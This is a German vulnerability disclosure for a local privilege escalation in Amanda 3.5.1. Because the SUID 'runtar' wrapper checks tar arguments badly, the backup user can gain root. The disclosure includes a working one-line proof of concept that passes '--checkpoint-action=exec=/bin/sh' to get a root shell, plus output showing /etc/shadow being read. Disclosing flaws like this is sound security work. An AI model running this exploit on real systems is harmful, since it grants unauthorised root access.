
Amanda 3.5.1 zweite LPE.
[Vorgeschlagene Beschreibung] In Amanda 3.5.1 wurde ein Fehler zur Privilegienausweitung gefunden, der den Backup-Benutzer zu Root-Rechten verhelfen kann. Die verwundbare Komponente ist das SUID-Programm runtar, das lediglich ein Wrapper ist, um /usr/bin/tar mit bestimmten Argumenten auszuführen, die vom Angreifer kontrolliert werden können. Das Programm prüft die an die tar-Binärdatei übergebenen Argumente nicht korrekt (es geht davon aus, dass alle Argumente in der Form --ARG VALUE übergeben werden, aber wir können --ARG=VALUE als ein Argument angeben).
[Zusätzliche Informationen] Dieser Fehler kann für Codeausführung, Denial of Service, Privilegienausweitung und Offenlegung von Informationen verwendet werden. Dies ist der PoC, um ihn auszunutzen und eine Root-Shell zu erhalten: backup@maher:/lib/amanda$ id uid=34(backup) gid=34(backup) groups=34(backup),6(disk),26(tape)
backup@maher:/lib/amanda$ head /etc/shadow head: cannot open '/etc/shadow' for reading: Permission denied
backup@maher:/lib/amanda$ ./runtar NOCONFIG tar --create --file=/dev/null --checkpoint=1 --directory=. --checkpoint-action=exec=/bin/sh /dev/null tar: Removing leading `/' from member names
head /etc/shadow
root:!:19132:0:99999:7::: daemon::19101:0:99999:7::: bin::19101:0:99999:7::: sys::19101:0:99999:7::: sync::19101:0:99999:7::: games::19101:0:99999:7::: man::19101:0:99999:7::: lp::19101:0:99999:7::: mail::19101:0:99999:7::: news:*:19101:0:99999:7:::
[Schwachstellentyp Andere] Fehlerhafte Argumentprüfung.
[Anbieter des Produkts] Amanda
[Betroffene Produktcodebasis] runtar - 3.5.1
[Betroffene Komponente] Die betroffene SUID-Binärdatei ist: runtar Die betroffene Datei ist: runtar.c Die betroffenen Codezeilen beginnen bei Zeile 162.
[Angriffsart] Lokal
[Auswirkung Codeausführung] true
[Auswirkung Denial of Service] true
[Auswirkung Privilegienausweitung] true
[Auswirkung Offenlegung von Informationen] true
[Angriffsvektoren] Um die Binärdatei auszunutzen, muss man lediglich manipulierte Argumente an die SUID-Binärdatei runtar übergeben, um eine Rechteausweitung zu Root zu erreichen.
[Referenz] http://www.amanda.org/
[Entdecker] Maher Azzouzi